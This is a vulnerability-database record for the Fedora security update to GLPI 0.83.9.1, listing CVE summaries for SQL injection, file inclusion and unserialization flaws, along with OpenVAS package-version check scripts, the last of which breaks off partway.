ID FEDORA:C06082218D Type fedora Reporter Fedora Modified 2013-07-05T02:08:10
Description
GLPI is the Information Resource-Manager with an additional Administration-Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make daily life easier for administrators, like a job-tracking-system with mail-notification and methods to build a database with basic information about your network-topology.
{"id": "FEDORA:C06082218D", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 18 Update: glpi-0.83.9.1-1.fc18", "description": "GLPI is the Information Resource-Manager with an additional Administration- Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system wi th mail-notification and methods to build a database with basic information about your network-topology. ", "published": "2013-07-05T02:08:10", "modified": "2013-07-05T02:08:10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2013-2225", "CVE-2013-2226", "CVE-2013-2227"], "lastseen": "2020-12-21T08:17:51", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2226", "CVE-2013-2227", "CVE-2013-2225"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866043", "OPENVAS:866045", "OPENVAS:1361412562310866045", "OPENVAS:1361412562310866607", "OPENVAS:866607", "OPENVAS:866043"]}, {"type": "nessus", "idList": ["FEDORA_2013-11396.NASL", "FEDORA_2013-11413.NASL", "FEDORA_2013-11315.NASL", "MANDRIVA_MDVSA-2013-240.NASL"]}, {"type": "fedora", "idList": ["FEDORA:9243121041", "FEDORA:CBD3C22326"]}, {"type": "exploitdb", "idList": ["EDB-ID:26530", "EDB-ID:26366"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122242"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13311"]}], "modified": "2020-12-21T08:17:51", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-12-21T08:17:51", "rev": 2}, "vulnersScore": 5.2}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "18", "arch": "any", "packageName": "glpi", "packageVersion": "0.83.9.1", "packageFilename": "UNKNOWN", "operator": "lt"}]}
{"cve": [{"lastseen": "2020-12-09T19:52:40", "description": "Multiple SQL injection vulnerabilities in GLPI before 0.83.9 allow remote attackers to execute arbitrary SQL commands via the (1) users_id_assign parameter to ajax/ticketassigninformation.php, (2) filename parameter to front/document.form.php, or (3) table parameter to ajax/comments.php.", "edition": 5, "cvss3": {}, "published": "2014-05-14T19:55:00", "title": "CVE-2013-2226", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2226"], "modified": "2014-05-15T12:44:00", "cpe": ["cpe:/a:glpi-project:glpi:0.83.1", "cpe:/a:glpi-project:glpi:0.83.2", "cpe:/a:glpi-project:glpi:0.83.3", "cpe:/a:glpi-project:glpi:0.83.6", "cpe:/a:glpi-project:glpi:0.83.5", "cpe:/a:glpi-project:glpi:0.83.31", "cpe:/a:glpi-project:glpi:0.83.4", "cpe:/a:glpi-project:glpi:0.83", "cpe:/a:glpi-project:glpi:0.83.8", "cpe:/a:glpi-project:glpi:0.83.7"], "id": "CVE-2013-2226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2226", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:glpi-project:glpi:0.83.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.7:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.8:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:glpi-project:glpi:0.83.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.31:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:59", "description": "GLPI 0.83.7 has Local File Inclusion in common.tabs.php.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-01T17:15:00", "title": "CVE-2013-2227", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2227"], "modified": "2019-11-04T20:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:glpi-project:glpi:0.83.7"], "id": "CVE-2013-2227", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2227", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:40", "description": "inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the _predefined_fields parameter to front/ticket.form.php.\nPer: http://cwe.mitre.org/data/definitions/502.html\n\n\"CWE-502: Deserialization of 
Untrusted Data\"", "edition": 5, "cvss3": {}, "published": "2014-05-27T14:55:00", "title": "CVE-2013-2225", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2225"], "modified": "2014-05-28T17:07:00", "cpe": ["cpe:/a:glpi-project:glpi:0.68.1", "cpe:/a:glpi-project:glpi:0.80.1", "cpe:/a:glpi-project:glpi:0.83.1", "cpe:/a:glpi-project:glpi:0.72.4", "cpe:/a:glpi-project:glpi:0.78", "cpe:/a:glpi-project:glpi:0.20", "cpe:/a:glpi-project:glpi:0.68.2", "cpe:/a:glpi-project:glpi:0.71.5", "cpe:/a:glpi-project:glpi:0.41", "cpe:/a:glpi-project:glpi:0.72.1", "cpe:/a:glpi-project:glpi:0.72", "cpe:/a:glpi-project:glpi:0.21", "cpe:/a:glpi-project:glpi:0.78.3", "cpe:/a:glpi-project:glpi:0.83.2", "cpe:/a:glpi-project:glpi:0.83.3", "cpe:/a:glpi-project:glpi:0.83.6", "cpe:/a:glpi-project:glpi:0.80.2", "cpe:/a:glpi-project:glpi:0.83.5", "cpe:/a:glpi-project:glpi:0.80.5", "cpe:/a:glpi-project:glpi:0.80.6", "cpe:/a:glpi-project:glpi:0.70", "cpe:/a:glpi-project:glpi:0.83.31", "cpe:/a:glpi-project:glpi:0.71.3", "cpe:/a:glpi-project:glpi:0.71.4", "cpe:/a:glpi-project:glpi:0.51a", "cpe:/a:glpi-project:glpi:0.80.4", "cpe:/a:glpi-project:glpi:0.71.6", "cpe:/a:glpi-project:glpi:0.83.9", "cpe:/a:glpi-project:glpi:0.80.3", "cpe:/a:glpi-project:glpi:0.6", "cpe:/a:glpi-project:glpi:0.78.5", "cpe:/a:glpi-project:glpi:0.65", "cpe:/a:glpi-project:glpi:0.68.3", "cpe:/a:glpi-project:glpi:0.83.4", "cpe:/a:glpi-project:glpi:0.80.61", "cpe:/a:glpi-project:glpi:0.40", "cpe:/a:glpi-project:glpi:0.78.2", 
"cpe:/a:glpi-project:glpi:0.72.2", "cpe:/a:glpi-project:glpi:0.78.1", "cpe:/a:glpi-project:glpi:0.5", "cpe:/a:glpi-project:glpi:0.42", "cpe:/a:glpi-project:glpi:0.31", "cpe:/a:glpi-project:glpi:0.72.3", "cpe:/a:glpi-project:glpi:0.30", "cpe:/a:glpi-project:glpi:0.70.1", "cpe:/a:glpi-project:glpi:0.71", "cpe:/a:glpi-project:glpi:0.83", "cpe:/a:glpi-project:glpi:0.51", "cpe:/a:glpi-project:glpi:0.83.8", "cpe:/a:glpi-project:glpi:0.70.2", "cpe:/a:glpi-project:glpi:0.71.2", "cpe:/a:glpi-project:glpi:0.78.4", "cpe:/a:glpi-project:glpi:0.83.7", "cpe:/a:glpi-project:glpi:0.71.1", "cpe:/a:glpi-project:glpi:0.68", "cpe:/a:glpi-project:glpi:0.80.7", "cpe:/a:glpi-project:glpi:0.80"], "id": "CVE-2013-2225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2225", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:glpi-project:glpi:0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.9:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.40:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.21:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.7:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:glpi-project:glpi:0.83:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.65:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.65:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.30:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.42:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.8:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.31:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.61:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.65:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.51a:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:glpi-project:glpi:0.72:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.51:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.41:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.31:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.7:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:1361412562310866045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866045", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11396", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11396\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866045\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:54 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11396\");\n script_xref(name:\"FEDORA\", value:\"2013-11396\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110788.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glpi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"glpi on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-24T11:10:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "Check for the Version of glpi", "modified": "2018-01-24T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:866045", "href": "http://plugins.openvas.org/nasl.php?oid=866045", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11396", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11396\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"glpi on Fedora 18\";\ntag_insight = \"GLPI is the Information Resource-Manager with an additional Administration-\n Interface. 
You can use it to build up a database with an inventory for your\n company (computer, software, printers...). It has enhanced functions to make\n the daily life for the administrators easier, like a job-tracking-system with\n mail-notification and methods to build a database with basic information\n about your network-topology.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(866045);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:54 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11396\");\n\n script_xref(name: \"FEDORA\", value: \"2013-11396\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110788.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of glpi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", 
rpm:\"glpi~0.83.9.1~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:52:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "Check for the Version of glpi", "modified": "2017-07-10T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:866043", "href": "http://plugins.openvas.org/nasl.php?oid=866043", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11413\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"glpi on Fedora 17\";\ntag_insight = \"GLPI is the Information Resource-Manager with an additional Administration-\n Interface. 
You can use it to build up a database with an inventory for your\n company (computer, software, printers...). It has enhanced functions to make\n the daily life for the administrators easier, like a job-tracking-system with\n mail-notification and methods to build a database with basic information\n about your network-topology.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(866043);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:31 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11413\");\n\n script_xref(name: \"FEDORA\", value: \"2013-11413\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110794.html\");\n script_summary(\"Check for the Version of glpi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc17\", rls:\"FC17\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:09:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "Check for the Version of glpi", "modified": "2018-01-17T00:00:00", "published": "2013-08-20T00:00:00", "id": "OPENVAS:866607", "href": "http://plugins.openvas.org/nasl.php?oid=866607", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866607);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:18:03 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11315\");\n\n tag_insight = \"GLPI is the Information Resource-Manager with an additional Administration-\nInterface. You can use it to build up a database with an inventory for your\ncompany (computer, software, printers...). 
It has enhanced functions to make\nthe daily life for the administrators easier, like a job-tracking-system with\nmail-notification and methods to build a database with basic information\nabout your network-topology.\n\";\n\n tag_affected = \"glpi on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-11315\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110621.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of glpi\");\n script_category(ACT_GATHER_INFO);\n 